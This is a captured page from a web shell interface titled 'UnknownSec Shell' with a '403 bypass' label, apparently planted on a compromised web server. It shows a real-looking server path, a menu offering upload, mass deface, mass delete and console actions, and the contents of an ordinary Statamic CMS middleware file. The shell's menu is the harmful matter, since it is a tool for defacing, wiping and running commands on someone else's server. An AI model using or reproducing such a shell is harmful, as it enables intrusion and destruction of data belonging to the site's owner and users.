shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Middleware
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
RequireStatamicPro.php
<?php namespace Statamic\Http\Middleware; use Closure; use Statamic\Exceptions\StatamicProAuthorizationException; use Statamic\Statamic; class RequireStatamicPro { public function handle($request, Closure $next) { if (! Statamic::pro()) { throw new StatamicProAuthorizationException(__('Statamic Pro is required.')); } return $next($request); } }
© 2026 UnknownSec